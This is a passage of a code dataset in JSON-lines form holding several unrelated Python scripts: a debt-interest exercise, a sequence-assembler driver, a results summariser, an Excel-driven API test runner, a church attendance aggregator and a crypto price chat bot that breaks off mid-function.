+{"seq_id":"133208357","text":"'''\n5.21. Calcula poupança (3)\n'''\n\ndivida = float(input(\"Dívida: \"))\ntaxa = float(input(\"Juros (Ex.: 3 para 3%): \"))\npagamento = float(input(\"Pagamento mensal: \"))\n\nmes = 1\n\nif (divida * (taxa / 100) > pagamento):\n print(\"Sua dívida não será paga nunca, pois os juros são superiores ao \\\n pagamento mensal.\")\nelse:\n saldo = divida\n jurosPago = 0\n\n while saldo > pagamento:\n juros = saldo * taxa / 100\n saldo = saldo + juros - pagamento\n jurosPago += juros\n print(f\"Saldo da dívida no mês {mes} é de R${saldo:6.2f}.\")\n mes += 1\n\n print(\n f\"Para pagar uma dívida de R${divida:8.2f}, a {taxa:5.2f} % de juros,\")\n print(\n f\"você precisará de {mes - 1} meses, pagando um total de \\\n R${jurosPago:8.2f} de juros.\")\n print(\n f\"No último mês, você teria um saldo residual de R${saldo:8.2f} \\\n a pagar.\")\n","sub_path":"pythonBook/chapter05/exercise5-21.py","file_name":"exercise5-21.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"600347897","text":"from __future__ import print_function, division\n\n''' A sequence assembler written in Python\n\n Approach:\n Incremental - reads are added one by one with no initial subsampling,\n screening or all-vs-all comparison\n Alignment - is stupid when a large number of reads will be error free and \n there is no reason to assume error free reads will be more likely to \n occur in particular regions of the genome\n Paired ends - we don't care about them. At least not unless they will help with scaffolding.\n And most people forgot they can do that and don't use large enough inserts to make it\n useful, so you might as well ignore them. Seriously.\n Refining - contigs are refined and improved as read read is added\n Fast - using kmer counting for seeding overlap detection\n\n'''\n\nfrom assembly import *\nimport glob\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Assemble NGS reads in FASTQ format into contigs\")\nparser.add_argument('files', metavar='fastq file', nargs=\"+\", help=\"name of a FASTQ read file\")\nparser.add_argument('--min_overlap', type=int, help=\"Minimum overlap required to consider reads a match\")\nparser.add_argument('--name', help=\"Name of the assembly\", default='Assembly')\n\nargs = parser.parse_args()\nif not args.min_overlap:\n args.min_overlap = 20\n\na = Assembly(args.name, args.min_overlap)\n\nfor filename in args.files:\n a.loadSeqFile(filename)\n\na.writeAssembly(a.id + \"-contigs.fasta\")\n","sub_path":"quad.py","file_name":"quad.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"236988871","text":"from glob import glob\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nimport torch\nfrom torchvision import datasets, transforms\nimport argparse\nimport os\n\n\ndef calculate_coeff(data, log=False, plot=False, show=False):\n data = np.array(data)\n data_clean = data[np.all(~np.isnan(data), axis=1)]\n ind_sort = np.argsort(data_clean[:,0])\n data_clean = data_clean[ind_sort]\n\n d, ll = tuple(zip(*data_clean))\n\n d = np.array(d).reshape(-1,1)\n ll = np.array(ll)\n \n if log:\n d = np.log(d)\n regr = linear_model.LinearRegression()\n regr.fit(d, ll)\n ll_pred = regr.predict(d)\n\n if plot:\n plt.plot(d, regr.predict(d), label=\"prediction\", c='r', alpha=0.5)\n plt.plot(d, ll, 'o-', alpha=0.5)\n if show:\n plt.show()\n \n return regr.coef_[0]\n\n\ndef powerset(s):\n x = len(s)\n masks = [1 << i for i in range(x)]\n for i in range(1 << x):\n yield [ss for mask, ss in zip(masks, s) if i & mask]\n\n\ndef summary(ll_path, epochs, deltas_count, deltas_total):\n assert 2 <= deltas_count <= deltas_total\n #results = list()\n #results = [list() for _ in range(9)]\n #print((('dim', ('inds',) + (('epoch', ),))))\n #results = [pd.DataFrame(columns=['epochs', 'avg_delta', 'dim']) for _ in range(deltas+1)]\n dims = list()\n #results = [[list() for _ in range(epochs)] for _ in range(deltas_count+1)]\n\n\n for epoch in list(range(1, epochs+1)):\n dims.append(list())\n fnames = sorted(glob(os.path.join(ll_path, f\"ll_*_{epoch}.txt\")))\n points = []\n for f in fnames:\n txt = pd.read_csv(f, sep=\" \", header=None)\n noise, pz, logdet, _, _ = txt.mean()\n points.append([noise, -(pz + logdet)])\n assert deltas_total == len(points)\n points = np.array(points)\n deltas = list()\n for first_delta in range(0, deltas_total-deltas_count+1):\n inds = np.arange(first_delta, first_delta+deltas_count)\n #print(points)\n #print(inds)\n avg_delta = sum(points[ind][0] for ind in inds)/len(inds)\n dim = calculate_coeff(points[inds, :], log=True, plot=False)\n dims[epoch-1].append(dim)\n deltas.append(avg_delta)\n\n return np.array(dims), np.array(deltas), np.arange(1, epochs+1)\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", help=\"number of epochs\", required=True)\nparser.add_argument(\"-ll\", help=\"path to ll\", required=True)\nparser.add_argument(\"-d\", help=\"number of deltas\", required=True)\nparser.add_argument(\"-ds\", help=\"size of deltas subsets\", required=True)\nargs = parser.parse_args()\n\ndeltas_subset_size = 2\nll_path = args.ll\nmax_epochs = int(args.n)\ndeltas_total = int(args.d)\ndeltas_subset_size=int(args.ds)\ndims, deltas, epochs = summary(ll_path, max_epochs, deltas_subset_size, deltas_total)\n\nprint(deltas)\nprint(dims)\n#print(np.vstack((deltas, dims)))\n#plt.yticks(np.array(deltas))\n#plt.xticks(np.arange(deltas_total-deltas_subset_size))\nplt.imshow(dims)\nplt.savefig(f'plots/plot.png')\n\n#plt.imshow(results[i]['dim'].to_numpy().reshape((max_epochs, deltas-i)))\n #deltas = results[i]['avg_delta'].to_numpy()\n #plt.xticks(np.arange(deltas-i))\n #plt.yticks(np.arange(1, max_epochs+1))\n #plt.imshow(results[i]['epochs'].to_numpy().reshape((max_epochs, deltas-i)), interpolation='bilinear')\n #print(results[i]['epochs'].to_numpy())\n","sub_path":"ll_results_summary.py","file_name":"ll_results_summary.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"302336518","text":"\n\"\"\"\n接口自动化测试\n1、excel测试用例准备好,代码可以自动读取用例数据\n2、执行接口测试,得到相应结果\n3、响应结果和预期结果作比较,看是否通过\n4、把测试是否通过的结果写入到excel工作表中\n\"\"\"\n#url=http://8.1729.91.152:8766/futureloan/member/register\n#第一步,把读取测试用例数据封装成一个函数\nimport json\n\nimport requests\nimport openpyxl\n\ndef read_case(filename,sheetname):\n wb=openpyxl.load_workbook(filename,sheetname)#加载工作簿,打开一个Excel文件\n sheet=wb[sheetname]#打开某一个表单\n row_max=sheet.max_row#获取最大行函数\n case_list=[] #新建一个空列表,存放for循环依次读取到的测试用例\n for i in range(2,row_max+1):\n data_dict=dict(\n case_id=sheet.cell(row=i,column=1).value,\n url=sheet.cell(row=i,column=5).value,\n data=sheet.cell(row=i,column=6).value,\n expect=sheet.cell(row=i,column=7).value\n )\n case_list.append(data_dict)#把每一行读取测试用例生成的字典,逐条追加到新的列表\n return case_list\n#第二部,执行接口测试\ndef api_fun(url,data):\n headers={\"X-Lemonban-Media-Type\":\"lemonban.v2\",\"Content-Type\":\"application/json\"}\n result_register=requests.post(url=url,data=data,headers=headers).json()\n return result_register\n\n#写入测试结果\ndef write_result(filename,sheetname,row,column,final_result):\n wb=openpyxl.load_workbook(filename) #加载工作簿,打开一个excel文件\n sheet=wb[sheetname]#打开某一个表单\n sheet.cell(row=row,column=column).value=final_result\n wb.save(filename)\n\ndef excute_fun(filename,sheetname):\n cases=read_case(filename, sheetname)#调用函数\n for case in cases:\n case_id=case['case_id']\n url=case['url']\n data=case['data']\n expect=eval(case['expect'])\n expect_msg=expect['msg']\n print(case_id)\n print('期望结果为{}'.format(expect_msg))\n real_result=api_fun(url=url,data=data)#调用函数\n real_msg=real_result['msg']\n print('实际结果为{}'.format(real_msg))\n if expect_msg==real_msg:\n print('这第{}条测试用例通过!'.format(case_id))\n final_result='Passed'\n else:\n print('这第{}条测试用例不通过!'.format(case_id))\n final_result='Failed'\n write_result(filename,sheetname,case_id+1,8,final_result)#调用函数\n print('*'*15)\n#\n# excute_fun('C:\\\\Users\\\\wzfwzf108122\\\\PycharmProjects\\\\python\\\\test_data\\\\test_case_api.xlsx','register')#调用函数\n","sub_path":"python_jianjian/lesson7.py","file_name":"lesson7.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"119247820","text":"#! python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 13 14:39:40 2018\r\n\r\n@author: btrev\r\n\r\nAccepts Churchbuilder attendance spreadsheets, calculates the total attendance\r\nfor each individual over the given period and builds a new spreadsheet from\r\nthis data.\r\n\"\"\"\r\n\r\nimport pyexcel, openpyxl, os, sys, re\r\nfrom openpyxl.utils import get_column_letter\r\n\r\n\r\ndef file_input():\r\n \"\"\"User inputs spreadsheet filename and corresponding group name.\"\"\"\r\n filename = input('Please enter a spreadsheet filename e.g. attendance.ods '\r\n '(or type q to quit)\\n')\r\n if filename == 'q' or filename == 'Q':\r\n return 1\r\n if not os.path.isfile(filename):\r\n raise Exception('Error: Must be a valid filename in the current '\r\n 'working directory.') \r\n if filename[-4:] != '.ods':\r\n raise Exception('Error: File must have the extension .ods') \r\n group = input('Please enter the group name for this register. \\n')\r\n return [filename,group]\r\n \r\ndef convert_to_xlsx(file):\r\n \"\"\"Convert the given .ods file into a .xlsx with the given group name in\r\n the new filename.\"\"\"\r\n filename, group = file\r\n #remove any illegal characters from group for use in filename\r\n legalGroup = ''.join(c for c in group if c.isalnum())\r\n xlsxName = 'attendance ' + legalGroup + '.xlsx'\r\n array = pyexcel.get_array(file_name = filename)\r\n pyexcel.save_as(array = array, dest_file_name = xlsxName)\r\n return [xlsxName, group]\r\n\r\ndef check_dates(file):\r\n \"\"\"Checks that the top row of the spreadsheet contains dates only.\"\"\"\r\n filename, group = file\r\n sheet = openpyxl.load_workbook(filename).active\r\n #regex will return value if there is a date\r\n dateRegex = re.compile(r'^\\d?\\d/\\d\\d$')\r\n for column in range(2, sheet.max_column):\r\n date = sheet.cell(1,column).value\r\n datecheck = dateRegex.search(date)\r\n if datecheck == None:\r\n raise Exception('Incorrect spreadsheet format: row 1 must be'\r\n 'dates only.')\r\n return\r\n\r\ndef get_names(attendance, file):\r\n \"\"\"Builds a dictionary with all the names that appear on the spreadsheet,\r\n values are dictionaries containing group name, to store attendance later.\"\"\"\r\n filename, group = file\r\n sheet = openpyxl.load_workbook(filename).active\r\n #regexes to check column 1 contains names only\r\n nameRegex = re.compile(r'^[a-zA-z\\-]+ [a-zA-z\\-]+$')\r\n for row in range(2, sheet.max_row): #Cell A1 is empty\r\n name = sheet['A' + str(row)].value\r\n namecheck = nameRegex.search(name)\r\n if namecheck == None:\r\n raise Exception('Incorrect spreadsheet format: column 1 must ' \r\n 'be names only.')\r\n else:\r\n attendance.setdefault(name, {}) \r\n attendance[name].setdefault(group,0)\r\n return\r\n\r\ndef sum_attendance_data(attendance, file):\r\n \"\"\"Sums the 'Y's that appear on the spreadsheet to calculate total\r\n attendance and stores the data in the attendance dictionary.\"\"\"\r\n filename, group = file\r\n sheet = openpyxl.load_workbook(filename).active\r\n #check the body of the spreadsheet consists only of Y and empty cells\r\n max_column_letter = get_column_letter(sheet.max_column)\r\n finalCell = max_column_letter + str(sheet.max_row)\r\n for row in sheet['A2':finalCell]:\r\n name = row[0].value\r\n for cell in row[1:]:\r\n if cell.value != 'Y' and cell.value != None:\r\n raise Exception('Incorrect spreadsheet format: data must '\r\n \"consist of 'Y's and empty cells only.\")\r\n #count the attendance for each name\r\n if 
cell.value == 'Y':\r\n attendance[name][group] += 1\r\n return\r\n\r\ndef gather_attendance_data():\r\n \"\"\"Allows multiple spreadsheets to be input by the user for different \r\n groups. The attendance data for all the groups is stored in the attendance\r\n dictionary.\"\"\"\r\n attendance = {}\r\n groups = []\r\n while True:\r\n try:\r\n file = file_input()\r\n if file == 1:\r\n break\r\n groups.append(file[1]) #save group name for later\r\n xlsxFile = convert_to_xlsx(file)\r\n check_dates(xlsxFile)\r\n get_names(attendance, xlsxFile)\r\n sum_attendance_data(attendance, xlsxFile)\r\n os.remove(xlsxFile[0])\r\n except Exception as err:\r\n print(err)\r\n #delete any new .xlsx files\r\n if 'xlsxFile' in locals():\r\n if os.path.isfile(xlsxFile[0]):\r\n os.remove(xlsxFile[0])\r\n continue\r\n \r\n return [attendance, groups]\r\n\r\ndef write_totals_sheet(attendance, groups):\r\n \"\"\"Writes the total attendance data to a new spreadsheet. Column 1 is names\r\n row 1 is group names.\"\"\" \r\n if attendance == {}:\r\n return\r\n wb = openpyxl.Workbook()\r\n totalsSheet = wb.active\r\n #group names as column headers\r\n for i in range(len(groups)):\r\n totalsSheet.cell(1,i+2).value = groups[i]\r\n #enter data row by row\r\n row = 2\r\n column = 1\r\n for name, groupAtt in sorted(attendance.items()):\r\n totalsSheet.cell(row,1).value = name\r\n for group, attVal in groupAtt.items():\r\n column = groups.index(group) + 2 #find correct group column\r\n totalsSheet.cell(row,column).value = attVal\r\n row = row + 1\r\n \r\n wb.save('Total Attendance.xlsx')\r\n \r\ndef main():\r\n attendance, groups = gather_attendance_data()\r\n write_totals_sheet(attendance,groups)\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n sys.exit(main())\r\n","sub_path":"totalAttendance.py","file_name":"totalAttendance.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"313511859","text":"#!/usr/bin/env python3\n\nimport sys\nimport slack\nfrom telegram import InlineQueryResultArticle,InputTextMessageContent\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, InlineQueryHandler\nfrom uuid import uuid4\nimport logging\nimport exchanges\nimport requests\nimport math\nfrom datetime import datetime, timedelta\nimport re\nimport time\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s-%(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nBOTNAME = '@BotName_Bot'\nTOKEN = 'TELEGRAMTOKEN'\nCL_API_KEY = 'CLAPIKEY'\nSLACK_BOT_TOKEN = \"SLACKTOKEN\"\nSLACK_MENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\n\nmillnames = ['',' k',' mio',' bio',' trillion']\n\nbm = exchanges.get_exchange('bitmex')\n\ndef millify(n):\n try:\n n = float(n)\n except:\n n = 0\n millidx = max(0,min(len(millnames)-1, int(math.floor(0 if n == 0 else math.log10(abs(n))/3))))\n return '{:.1f}{}'.format(n / 10**(3 * millidx), millnames[millidx])\n\ndef startMsg(update, context):\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Type /list to get a list of supported exchanges and underlyings.\\nType /price to retrieve a price.\\nFor example /price btcusd kraken\")\n\ndef bitmexMsg(update, context):\n logger.info(\"Received /bitmex command from %s\" % update.effective_user)\n if update.message.text.split().__len__()<=1:\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Syntax is /bitmex . For example /bitmex XBTH18\")\n else:\n futlist = update.message.text.upper().split()[1:]\n message_text = \"\"\n for i, fut in enumerate(futlist):\n message_text+=bitmex(fut)\n if i != len(futlist)-1:\n message_text+='\\n------------\\n'\n update.message.reply_text(message_text)\n\ndef bitmex(fut):\n if len(fut) == 3:\n fut = 'XBT'+fut\n if fut[:3] == 'XBT':\n exch = ['gdax', 'bitstamp']\n spot = 'BTCUSD'\n else:\n exch = ['poloniex','bittrex']\n spot = fut[:3] + 'BTC'\n fut_stream = bm.get_stream(fut)\n if fut_stream == None:\n fut_stream = bm.init_symbol(fut)\n fut_bid = bm.get_quote(fut, 'bid')\n fut_ask = bm.get_quote(fut, 'ask')\n if fut_bid == None or fut_ask == None:\n message = \"Something went wrong, check future code \" + fut\n return message\n expiry = bm.get_instrument(fut)['expiry']\n nowdate = datetime.now()\n if expiry is None:\n expdate = nowdate\n else:\n expdate = datetime.strptime(bm.get_instrument(fut)['expiry'],'%Y-%m-%dT%H:%M:%S.%fZ')\n yearstoexp = (expdate - nowdate).total_seconds()/3600/24/365.25\n spot_bid = 0\n spot_ask = 0\n i = 0\n for en in exch:\n e = exchanges.get_exchange(en)\n if spot in e.get_supported_underlyings():\n spot_bid += e.get_quote(spot, 'bid')\n spot_ask += e.get_quote(spot, 'ask')\n i+=1\n spot_bid = float(spot_bid / i)\n spot_ask = float(spot_ask / i)\n basis_bid = fut_bid - spot_ask\n basis_ask = fut_ask - spot_bid\n spot_mid = (spot_bid + spot_ask)/2\n fut_mid = (fut_ask + fut_bid)/2\n basis_mid = (basis_ask + basis_bid)/2\n message = \"\"\n if basis_ask < 0:\n basis_premium = 100 * basis_ask / spot_mid\n elif spot_mid != 0:\n basis_premium = 100 * basis_bid / spot_mid\n else:\n basis_premium = 0\n message += \"Couldn't find supported exchange for spot price.\\n\"\n if yearstoexp == 0:\n annualized_premium = 0\n else:\n annualized_premium = 100*((1+basis_premium/100)**(1/yearstoexp)-1)\n if spot_bid > 1:\n message += \"Spot %s price is %.2f: %.2f / %.2f\" % (spot, spot_mid, spot_bid, spot_ask) + '\\n'\n message += \"Fut %s price is %.2f: 
%.2f / %.2f\" % (fut, fut_mid, fut_bid,fut_ask) + '\\n'\n message += \"Basis is %.2f: %.2f / %.2f. Premium of %.1f%%\" % (basis_mid, basis_bid, basis_ask, basis_premium)\n else:\n message += \"Spot %s price is %.4g: %.4g / %.4g\" % (spot, spot_mid, spot_bid, spot_ask) + '\\n'\n message += \"Fut %s price is %.4g: %.4g / %.4g\" % (fut,fut_mid, fut_bid, fut_ask) + '\\n'\n message += \"Basis is %.4g: %.4g / %.4g. Premium of %.1f%%\" % (basis_mid, basis_bid, basis_ask, basis_premium)\n if annualized_premium !=0:\n message += \" (%.1f%% annualised)\" % annualized_premium\n return message\n\ndef unknownMsg(update, context):\n logger.info(\"Received unknown command from %s: %s\" % (update.effective_user, update.message.text))\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Sorry, try /start again?\")\n\ndef listExchangesMsg(update, context):\n logger.info(\"Received /list command from %s\" % update.effective_user)\n update.message.reply_text(list_text())\n\ndef list_text():\n exchange_text = 'List of supported exchanges:\\n'+'\\n'.join(sorted(exchanges.exchange_list.keys()))\n underlyings_text = 'List of available underlyings:\\n'+'\\n'.join(sorted(exchanges.get_underlyings_list()))\n end_text = 'Try /exchange to price all underlyings availablle on an exchange'\n return exchange_text + '\\n\\n' + underlyings_text + '\\n\\n' + end_text\n\ndef summaryMsg(update, context):\n logger.info(\"Received /summary command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 1:\n ccy = ['globalsummary']\n else:\n ccy = update.message.text.split()[1:]\n update.message.reply_text('\\n'.join(summary(ccy)))\n\ndef summary(ccy_list):\n mapping = {\n 'btc' : 'bitcoin',\n 'eth' : 'ethereum',\n 'snt' : 'status',\n 'xrp' : 'ripple',\n 'xmr' : 'monero',\n 'gno' : 'gnosis-gno',\n 'gnosis' : 'gnosis-gno',\n 'pay' : 'tenx',\n 'cvc' : 'civic',\n 'dnt' : 'district0x',\n 'san' : 'santiment',\n 'omg' : 'omisego',\n 'zerox' : '0x',\n 'request' : 'request-network',\n 'req' : 'request-network',\n 'bch' : 'bitcoin-cash',\n 'cash' : 'cash-poker-pro',\n 'zec' : 'zcash',\n 'lgo' : 'legolas-exchange',\n 'legolas' : 'legolas-exchange',\n 'xlm' : 'stellar',\n 'zrx' : '0x'\n }\n results = []\n for ccy in ccy_list:\n ccy = ccy.lower()\n url = 'https://api.coinmarketcap.com/v1/ticker/%s' % ccy\n if ccy in mapping.keys():\n ccy = mapping[ccy]\n url = 'https://api.coinmarketcap.com/v1/ticker/%s' % ccy\n elif ccy == 'globalsummary':\n url = 'https://api.coinmarketcap.com/v1/global/'\n try:\n r = requests.get(url)\n r.raise_for_status()\n j = r.json()\n except requests.exceptions.RequestException as err:\n print(err)\n results.append(\"Something went wrong for currency %s\" % ccy)\n results.append('')\n continue\n if ccy == 'globalsummary':\n mkt_cap_usd = millify(j['total_market_cap_usd'])\n vol_usd = millify(j['total_24h_volume_usd'])\n btc_pct = j['bitcoin_percentage_of_market_cap']\n nb_ccy = int(j['active_currencies']) + int(j['active_assets'])\n results.append('Total crypto market cap: %s (USD)' % mkt_cap_usd)\n results.append('Last 24h volume: %s (USD)'% vol_usd)\n results.append('Bitcoin share of total market cap: %s%%' % btc_pct)\n results.append('Number of tokens in circulation: %s' % nb_ccy)\n else:\n name = j[0]['name']\n price_usd = j[0]['price_usd']\n price_btc = j[0]['price_btc']\n vol_usd = millify(j[0]['24h_volume_usd'])\n mktcap_usd = millify(j[0]['market_cap_usd'])\n rank = int(j[0]['rank'])\n pchg_1h = 
j[0]['percent_change_1h']\n pchg_24h = j[0]['percent_change_24h']\n pchg_7d = j[0]['percent_change_7d']\n results.append('%s: %s (USD), %s (BTC). Changes: %s%% (1h), %s%% (24h), %s%% (7d).' % (name, price_usd, price_btc, pchg_1h, pchg_24h, pchg_7d))\n if str(rank)[-1:] == '1' and str(rank)[-2:] != '11':\n suffix = 'st'\n elif str(rank)[-1:] == '2' and str(rank)[-2:] != '12':\n suffix = 'nd'\n elif str(rank)[-1:] == '3' and str(rank)[-2:] != '13':\n suffix = 'rd'\n else:\n suffix = 'th'\n results.append('%s: Volumes in past 24h: %s USD. Market cap: %s USD. %s%s market cap.' % (name, vol_usd, mktcap_usd, rank, suffix))\n results.append('')\n return results\n\ndef exchangeMsg(update, context):\n logger.info(\"Received /exchange command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 1:\n update.message.reply_text('Syntax is \"/exchange <...>\".\\nTry \"/exchange all\" to price all underlying on all supported exchanges (can take a while).\\nType /list to see supported exchanges')\n return\n exchange_list = update.message.text.split()[1:]\n if exchange_list == ['all']:\n exchange_list = exchanges.get_exchanges_list()\n update.message.reply_text('\\n'.join(exchange(exchange_list)))\n\ndef exchange(exchange_list):\n results = []\n for en in exchange_list:\n try:\n e = exchanges.get_exchange(en.lower())\n except:\n results.append(\"Uknown exchange %s\" % en)\n continue\n results.append(\"%s:\\n\" % en)\n for ul in e.get_supported_underlyings():\n bid = e.get_quote(ul,'bid')\n ask = e.get_quote(ul,'ask')\n last = e.get_quote(ul,'last')\n if bid == 0 or ask == 0:\n spread = 1\n else:\n spread = (ask - bid) / ((ask+bid)/2)\n if last > 1:\n results.append(\"%s: Last trade %.2f. Market %.2f/ %.2f (%.1f%% wide)\" % (ul,last, bid, ask, spread * 100))\n else:\n results.append(\"%s: Last trade %.3g. 
Market %.3g / %.3g (%.1f%% wide)\" % (ul,last, bid, ask, spread * 100))\n results.append(\"--------------\")\n return results\n\ndef price(underlying, exchange_list):\n if underlying == 'BITCOIN':\n underlying = 'BTCUSD'\n all_requested = False\n if exchange_list == ['all']:\n all_requested = True\n exchange_list = exchanges.get_exchanges_list_for_underlying(underlying)\n if exchange_list == []:\n return ['No exchange support %s' % underlying]\n bestbid = 0.00000001\n bestask = 1000000000\n bestspread = 100\n bestbid_exch = exchange_list[0]\n bestask_exch = exchange_list[0]\n bestspread_exch = exchange_list[0]\n results = []\n i = 0\n for exchange_name in exchange_list:\n if exchange_name.lower() in exchanges.exchange_list.keys():\n exchange = exchanges.get_exchange(exchange_name.lower())\n if underlying in exchange.get_supported_underlyings():\n bid = exchange.get_quote(underlying, 'bid')\n ask = exchange.get_quote(underlying, 'ask')\n try:\n price = (bid + ask) / 2\n spread = 100 * (ask - bid) / price\n if not all_requested or spread < 3.5:\n if bid > bestbid:\n bestbid = bid\n bestbid_exch = exchange_name\n if ask < bestask:\n bestask = ask\n bestask_exch = exchange_name\n if spread < bestspread:\n bestspread = spread\n bestspread_exch = exchange_name\n i = i + 1\n if price > 1:\n results.append(\"%s %s price is %.2f: %.2f / %.2f (%.2f%% wide)\" % (exchange_name, underlying, price, bid, ask, spread))\n else:\n results.append(\"%s %s price is %.4g: %.4g / %.4g (%.2f%% wide)\" % (exchange_name, underlying, price, bid, ask, spread))\n except:\n results.append(\"%s price update failed\" % exchange_name)\n else:\n results.append('%s not supported for %s' % (underlying, exchange_name))\n else:\n results.append(\"Unknown exchange: %s\" % exchange_name)\n if i >= 2:\n spread = 100 *(bestask / bestbid - 1)\n if price > 1:\n results.append(\"Max bid is on %s: %.2f\\nMin offer is on %s: %.2f.\\nBest spread is on %s: %.2f%%\\nAggregated price is %.1f%% wide (negative means arbitrageable)\" % (bestbid_exch, bestbid, bestask_exch, bestask, bestspread_exch, bestspread, spread))\n else:\n results.append(\"Max bid is on %s: %.4g\\nMin offer is on %s: %.4g.\\nBest spread is on %s: %.2f%%\\nAggregated price is %.1f%% wide (negative means arbitrageable)\" % (bestbid_exch, bestbid, bestask_exch, bestask, bestspread_exch, bestspread, spread))\n return results\n\ndef fx(underlying, exchange, cross_ccy):\n FORCCY = underlying[:3].upper()\n DOMCCY = underlying[-3:].upper()\n\n if cross_ccy in ('USD','EUR','JPY'):\n FORPAIR = DOMCCY+cross_ccy\n DOMPAIR = FORCCY+cross_ccy\n else:\n FORPAIR = cross_ccy+FORCCY\n DOMPAIR = cross_ccy+DOMCCY\n\n if exchange == \"all\":\n forExchanges = exchanges.get_exchanges_list_for_underlying(FORPAIR)\n domExchanges = exchanges.get_exchanges_list_for_underlying(DOMPAIR)\n intersectExchanges = list(set(forExchanges).intersection(domExchanges))\n elif exchange.lower() not in exchanges.get_exchanges_list():\n return ['Unsupported exchange %s' % exchange]\n else:\n if (FORPAIR in exchanges.get_exchange(exchange.lower()).get_supported_underlyings()) and (DOMPAIR in exchanges.get_exchange(exchange.lower()).get_supported_underlyings()):\n intersectExchanges = [exchange]\n else:\n return [\"Exchange %s does not support %s and %s\" % (exchange, FORPAIR, DOMPAIR)]\n results = []\n if not intersectExchanges:\n return [\"No exchange supports %s and %s\" % (FORPAIR, DOMPAIR)]\n\n try:\n e = exchanges.get_exchange(intersectExchanges[0].lower())\n fxRate = float(e.get_quote(underlying,'last'))\n 
results.append('%s rate for %s is %.5g' % (intersectExchanges[0], underlying, fxRate))\n except:\n url = 'http://www.apilayer.net/api/live?access_key='+CL_API_KEY+'&currencies='+FORCCY+','+DOMCCY\n r = requests.get(url)\n r.raise_for_status()\n j = r.json()\n if j['success'] and 'quotes' in j:\n if 'USD'+DOMCCY in j['quotes'] and 'USD'+FORCCY in j['quotes']:\n domOfficialRate = j['quotes']['USD'+DOMCCY]\n forOfficialRate = j['quotes']['USD'+FORCCY]\n fxRate = domOfficialRate / forOfficialRate\n results.append('Currency Layer %s FX rate is %.5g' % (underlying, fxRate))\n else:\n fxRate = 0\n results.append('Could not retrieve %s FX rate from CurrencyLayer' % underlying)\n else:\n fxRate = 0\n results.append('Could not retrieve %s FX rate from CurrencyLayer' % underlying)\n\n results.append('Using %s as the cross currency: %s and %s' % (cross_ccy.upper(), FORPAIR, DOMPAIR))\n\n for exch in intersectExchanges:\n e = exchanges.get_exchange(exch.lower())\n try:\n fx_bid = e.get_quote(DOMPAIR,'bid') / e.get_quote(FORPAIR,'ask')\n fx_ask = e.get_quote(DOMPAIR,'ask') / e.get_quote(FORPAIR,'bid')\n if fxRate != 0 and (fx_bid > fxRate or fx_ask < fxRate):\n if fx_bid > fxRate:\n arb = 100 * (float(fx_bid) / fxRate - 1)\n else:\n arb = 100 * (fxRate / float(fx_ask) - 1)\n results.append('%s on %s: bid %.5g / %.5g ask. %.2f%% arb vs %.5g official rate' % (underlying, exch, fx_bid, fx_ask, arb, fxRate))\n else:\n results.append('%s on %s: bid %.5g / %.5g ask' % (underlying, exch, fx_bid, fx_ask))\n except ZeroDivisionError:\n results.append('%s: one of the quotes is worth 0' % exch)\n return results\n\ndef priceMsg(update, context):\n logger.info(\"Received /price command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 2:\n update.message.reply_text('Syntax is \"/price <...>\".\\nTry \"/price all\" to price your underlying on all supported exchanges.\\nType /list to see supported exchanges')\n return\n underlying = update.message.text.split()[1].upper()\n exchange_list = update.message.text.split()[2:]\n if exchange_list == []:\n exchange_list = ['all']\n messages = price(underlying, exchange_list)\n update.message.reply_text('\\n'.join(messages))\n\ndef fxMsg(update, context):\n logger.info(\"Received /fx command from %s\" % update.effective_user)\n logger.info(\"Command content: %s\" % update.message.text)\n if update.message.text.split().__len__() <= 2:\n update.message.reply_text('Syntax is \"/fx \".\\nTry \"/fx all eth\" to price your underlying on all supported exchanges with eth as the cross cryptocurrency.\\nType /list to see supported exchanges')\n return\n underlying = update.message.text.split()[1].upper()\n exchange_list = update.message.text.split()[2]\n if update.message.text.split().__len__() == 4:\n cross_ccy = update.message.text.split()[3].upper()\n else:\n if underlying[-3:].upper() == 'BTC' or underlying[:3].upper() == 'BTC':\n cross_ccy = 'USD'\n else:\n cross_ccy = 'BTC'\n if exchange_list == []:\n update.message.reply_text('No exchange specified. 
